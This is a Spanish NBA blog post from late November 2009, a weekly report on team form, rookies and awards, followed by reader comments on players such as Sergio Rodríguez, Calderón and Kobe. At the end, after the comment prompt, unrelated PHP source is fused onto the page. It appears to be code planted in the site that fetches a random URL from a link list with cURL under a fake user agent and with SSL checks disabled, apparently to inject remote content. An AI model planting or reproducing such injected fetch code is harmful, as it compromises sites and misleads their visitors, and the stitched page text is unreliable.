Informe Semanal #5

30 de November de 2009 por txusma

¿Porqué todos los jugones sonríen igual?

Después de unos 17 partidos, Phoenix ya es el  mejor equipo de la liga. Quien se lo iba a decir. Los Suns recuerdan en algunos momentos a aquellos que nos maravillaron hace unos años de la mano de D’Antoni con un Nash que aparece entre los MVP de este inicio de temporada. Semanita perfecta la que han completado como los megafavoritos Lakers y Celtics.

Las sorpresas son las 4 victorias de los Spurs, justo cuando empezábamos a dudar de ellos, y, sobretodo, la semana immaculada de los Bobcats. La llegada de Stephen Jackson les ha sentado estupendamente y de momento parece todo un acierto. Habrá que echarles un ojo ahora que cuentan con un jugador capaz de anotar como el ex de los Warriors y otro en un estado de forma extraordinario como Gerald Wallace. Atención porque ahora mismo es el tercer mejor reboteador de la liga con casi 12 rebotes por partido. Algo increíble para un jugador de 2 metros.

La vida puede ser maravillosa

Con la que les ha caído en otros momentos es justo destacar la semana de los Clippers y los Kings. 3 victorias y una solo derrota lo que los deja cerquita de los puestos de Playoffs. Eric Gordon ha vuelto de su lesión y en cuanto lo haga Blaker Griffin habrá que tener en cuenta a este equipo que no puede ser dado por muerto. En Sacramento cada día que pasan deben plantearse más la venta de Kevin Martin vistos los buenos resultados cosechados desde su lesión. Con Tyreke al mando (y Sergio disfrutando de minutos) las cosas funcionan mucho mejor.Los Nuggets acaban también la semana en positivo pero hay que decir que lo han conseguido frente a los 3 peores equipos de la competición y perdiendo un partido frente a los Wolves. Tampoco es para tirar cohetes.

Cleveland, Washington, Oklahoma, Utah y Orlando (líderes del Este) son los otros equipos que pueden sentirse medianamente satisfechos esta semana.

Ganarás el pan con el sudor de tu frente

Se podía esperar en Dallas una derrota frente Cleveland pero no frente a los Warriors. De todas maneras continúan terceros del Oeste. Sensaciones diferentes han de tener en Memphis donde poco a poco parece que las cosas se van haciendo medianamente bien. El equipo no es la banda ingobernable que todos pronosticábamos y ganarles no es sencillo, que digamos. New Orleans y Portland también acaban la semana en tablas.

Se dejaban llevar

En los Pistons echan tanto en falta a Hamilton&Prince… Han encadenado 7 derrotas consecutivas rota esta semana gracias a una prestigiosa victoria frente los Hawks, que les deja claramente fuera de los Playoffs del Este. Hacía tiempo que no se veían en esta situación en Detroit.

Heat y Hawks acaban la semana en negativo algo a lo que no están muy acostumbrados. Parece que los de la ciudad de la Coca-Cola se desinflan por momentos. Más contentos deben estar en Golden State, capaces de ganar un partido frente a los Mavs a pesar de las innumerables bajas, o en Minnesota, que ha vuelto a saborear la victoria después de tanto tiempo.

En Houston, Indiana y Toronto tampoco hay fiesta esta semana. ¿Cuánto te durará el crédito, José?

El Carabasas Club

Hasta 5 equipos (todos del Este) aparecen esta semana en lo más hondo de la clasificación. Tal vez los menos hundidos han sido los Bulls porque tan solo han jugado 2 partidos, pero el resto han perdido los 4 encuentros disputados.

Hasta hace 2 días en Milwaukee estaban en la nube a la que les había llevado Brandon Jennings, pero una vez ha pasado el efecto sorpresa, se han desinflado también de la mano del rookie. A los Sixers les ha mirado el tuerto y juegan sin Louis Williams, Marresse Speights y Elton Brand. Con este panorama es normal que hasta se planteen la vuelta de Allen Iverson.

Lo de New York y New Jersey casi mejor ni nombrarlo. Bueno sí. 0 de 17 para los Nets, igualando el peor inicio de la historia, Lawrence Frank despedido… Y el siguiente partido es frente Dallas.

PREMIOS TJNBA

¿Qué has hecho tú que no hayamos hecho los demás?

El equipo más en forma de la liga ahora mismo son los Ángeles Lakers y el mejor equipo del primer mes de competición ha sido Phoenix. Respectivamente Kobe ha registrado esta semana 28 puntos por partido, 6 rebotes y 5.5 asistencias con algunas de las canastas más bellas que hayamos visto y Nash ha vuelto por sus fueros con nada menos que 12 asistencias por partido, además de casi 17 puntos… que su equipo agradece y de qué manera. ¿Será posible que opte a su 3er MVP? Sería increíble.

Al salir de clase

El mejor rookie del mes no cabe duda de que es Jennings… “el nuevo Iverson”. El mejor rookie de la semana, en esta ocasión, merecidamente es Tyreke Evans. 20.5 ppp, 6 rebotes y 4.5 asistencias. Numeros fantásticos para el único que le puede toser ahora mismo a Jennings… y encima el balance de su equipo es estupendo.

La vida puede ser maravillosa

Tras el partidazo que se marcó anoche Sergio y algunos otros que ha podido disfrutar esta semana, por fuerza le tenemos que nombrar a él. Parece que es cierto que un jugador puede ganar mucho con minutos y confianza. Veremos si este salto de calidad tiene verdaderas consecuencias positivas. En lo que se refiere al mes de Noviembre, la sorpresa más positiva son los 16 puntos 10 rebotes y las sensaciones que está transmitiendo Marc Gasol en Memphis.

Cortocircuitos S.L.

La cosa va de paisanos… Calderón rubricó anoche con 2 puntos una decepcionante semana que empezó con el baño que le pegó a TJ. Las sensaciones son cada vez peores con el extremeño y no debería extrañar si algún día de estos Jarret Jack le birla el sitio. Tampoco sería injusto atendiendo a nuestros propios criterios cuando la situación estaba en su contra. No obstante la mayor decepción de lo que llevamos de liga es el 0-17 de los Nets con la consecuencia del despido de Larry Frank. Si la solución pudiera ser esa perfecto… pero parece que este equipo va a ser capaz de pulverizar todos los récords negativos.

Comenta

13 comentarios a esta entrada

  1. shen0ne dice:
    #1

    acabo de descubrir este blog por el de a. daimiel y seas quien seas escribes muy bien
    muy de acuerdo con lo de Calderón, si sigue así igual antes de navidades Jack ya lo supera en minutos

      Citar

  2. sergio dice:
    #2

    Jennings… el “nuevo Iverson” jajajaj que ganas de meter los dedos en la llaga con las disputas que tenemos

      Citar

  3. Love Denise dice:
    #3

    no son disputas, son diferentes puntos de vista, si todos tenemos la misma opinión, ….apaga y vamonos..

    por otro lado, cada vez más veo a calde del club “dejandose llevar”, al contrario que el chacho, que por fin empieza a echarle eggs.
    no creo que el problema de los nets fuera frank, ni la solucion echar al coach.

      Citar

  4. Viva_Dirk dice:
    #4

    Vaya crack este Deer, no seré yo quien compare a Jennings con Iverson, de momento me encanta Jennings, los malos porcentajes son típicos de los años rookies.

    A ver si lo de Sergio dura, que es mejor base que la mitad de los titulares de la liga.

      Citar

  5. TheDeerHunter dice:
    #5

    ¿quien dice que he sido yo?? :b
    No sé si Sergio es mejor base que la mitad… pero que una buena parte sí. Lo que no puede ser es que se le exijan resultados a un tipo cuyas oportunidades habían sido únicamente el caminar por el filo de la navaja.
    Con respecto a Calderón… conociéndole no podría atreverme a lo del “se dejaba llevar” pero es evidente que está teniendo graves problemas de adaptación a las nuevas circunstancias que le rodean. Tampoco conocemos con exactitud cual es el alcance del problema. Habrá que estar atentos.

      Citar

  6. Fran Reyes dice:
    #6

    Sergio está aprovechando las oportunidades de las que hablábamos el otro día. 15 puntos y 5 asistencias de media en los últimos 4 partidos son buenos registros para él… y más aún habiendo jugado sólo 18 minutos de media.

      Citar

  7. Óscar dice:
    #7

    Una alegría ver “despertar” a Sergio. Parece que ha entendido por fin de qué va la película en la NBA, donde si no eres atrevido y con ese punto de egoísmo necesario, sobre todo tras 3 años de experiencia, te quedas en poca cosa. Si juega así no debe tener miedo de la vuelta de K.Martin ni más tarde de F.García. Con Evans y Udrih están montando un buen grupo de perímetro, y sigo atento a Donte Green, que está empezando a jugar como sabe.
    Lo de Toronto tiene mal color. Con tantos nuevos (9) y fiarse todo a un estilo alegre del “méteme más puntos si puedes”… Ya en los análisis decíamos los problemas que tendrían en defensa en general, pero lo de los interiores es demasiado, y Reggie Evans es la peor baja que podían tener precisamente por eso. Demasiado blandos, y los rivales destrozándoles una y otra vez en penetración y rebote ofensivo… Si eres tan débil en defensa no puedes sustentar ningún proyecto mínimamente serio.
    Y no olvidemos que los Suns están defendiendo muy bien (cosa de la que se habla poco) y están manejando los partidos a la perfección. Y su ataque es de lujo, con un Nash de clinic permanente, con 32 MPG (la menor cantidad de minutos por partido). Si Gentry no es el entrenador del año y Frye el MIP me sorprendería mucho, a pesar de estar en estas fechas. Enorme trabajo.

      Citar

  8. PIRATA dice:
    #8

    Que pena Memphis esta madrugada, con el partidazo que se estaba marcando Marc, desastroso el último quarto.

      Citar

  9. Óscar dice:
    #9

    Perdón, es Donte Greene…

      Citar

  10. TheDeerHunter dice:
    #10

    Hace tiempo que no escribo nada en plan comentario Lakeriano… en plan forofo que también lo soy.
    La pinta del equipo es acojonante. No es que estemos para tirar cohetes en todos los sentidos y también es el equipo que menos partidos fuera lleva jugados de los de arriba pero…
    – Ver a Kobe jugar en estos momentos es un superlujazo. Para mí está siendo el mejor Kobe de la historia… tan sólo con el nuevo recurso del posteo. Lleva metidas en un mes algunas de las mejores jugadas que le he visto hacer nunca. Cada canasta es de gourmet.
    – Pau ha alcanzado un supremo conocimiento de cómo se mueve ésta liga. Si antes ya tenía facilidad para producir pero destacábamos sus intangibles… ahora da la sensación de que simplemente pone la caña. Parece que ni suda. Máxima efectividad… y algo de efectismo. Como debe de ser para asegurarse All-Stars y premios a cholón.
    – No me canso de ver a Fisher jugar, ójala lo haga toda la vida… pero Farmar por fin está recuperando forma y confianza.
    – A Artest este sistema le va como anillo al dedo… lo que no me explico viéndole jugar es que este tío se haya creído alguna vez un paladín ofensivo. Lo que mola es que reparte hasta cuando ataca.
    – Shannon Brown es un pasote de jugador… si por una de esas logra coger fundamentos hay jugador para rato.

      Citar

  11. Love Denise dice:
    #11

    quizas haya que exigirle un poco más de protagonismo a Odom, aunque en lineas generales lo está haciendo bien

      Citar

  12. Óscar dice:
    #12

    De acuerdo sobre Lakers, un equipazo donde todo sale, incluso cuando tuvieron las bajas de Gasol y Bynum a la vez. No sé quién ganará el MVP, pero viendo jugar a Kobe no hay muchas dudas sobre quién es el mejor (yo el año pasado se lo habría dado a Wade). Y Don Shannon, un auténtico partidazo y acierto, necesitaba a un Phil Jackson para despuntar como sabe, explotando su físico… vaya freaky…

      Citar

  13. Love Denise dice:
    #13

    como diría Anthony Kiedis y Flea… …. Freak of Nature,
    me refiero a Brown.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>